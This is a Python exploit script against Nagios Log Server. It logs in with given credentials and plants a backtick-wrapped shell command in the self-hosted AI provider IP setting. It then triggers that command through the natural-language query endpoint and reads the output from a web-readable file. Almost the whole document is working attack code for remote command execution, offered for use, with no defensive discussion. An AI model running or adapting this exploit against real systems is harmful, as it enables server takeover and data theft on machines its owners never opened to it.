import requests import sys ## Usage # $ python3 exploit.py host = sys.argv[1] username = sys.argv[2] password = sys.argv[3] cmd = sys.argv[4] proxies = dict.fromkeys(['http','https'],'http://127.0.0.1:8080') login_url = f'{host}nagioslogserver/login' globals_setting_url = f'{host}nagioslogserver/admin/globals' nlq_url = f'{host}nagioslogserver/dashboard/natural_language_to_query?query=doesntmatter' get_output = f'{host}nagioslogserver/scripts/test.txt' with requests.Session() as s: s.proxies.update(proxies) s.verify = False csrf_req = s.get(login_url) csrf_ls = csrf_req.cookies['csrf_ls'] login_payload = { 'csrf_ls': csrf_ls, 'username': username, 'password': password } login_req = s.post(login_url, data=login_payload, allow_redirects=False) if 'ls_session' not in login_req.cookies: print("[-] Incorrect credentials") exit() print(f"[+] Login worked, adding command injection to self_host_ip_address") cmd_injection_payload = { "csrf_ls": csrf_ls, "natural_language_query": 1, "nlp_disclaimer": "on", "ai_provider": "self_hosted", "self_host_ip_address": f"`{cmd}>/var/www/html/nagioslogserver/www/scripts/test.txt`", # This is simply to view command output. Remove and replace with any command you want to execute "ai_port": 8000, "saveglobals":1 } cmd_injection_res = s.post(globals_setting_url, data=cmd_injection_payload) if not cmd_injection_res.ok: print(f"[-] Cmd injection probably didn't work") exit() if cmd not in cmd_injection_res.text: print(f"[*] Command didn't show up in the response text, still check if it works...") print(f"[*] Triggering command with request to natural language query endpoint {nlq_url}") nlq_res = s.get(nlq_url) if not nlq_res.ok: print(f"[-] Something failed requesting {nlq_url}, check {get_output} for cmd output") cmd_out_res = s.get(get_output) if not cmd_injection_res.ok: print(f"[-] No output for '{cmd}' at {get_output}") else: print(f"[+] Output of {cmd} located here: {get_output}") print(cmd_out_res.text)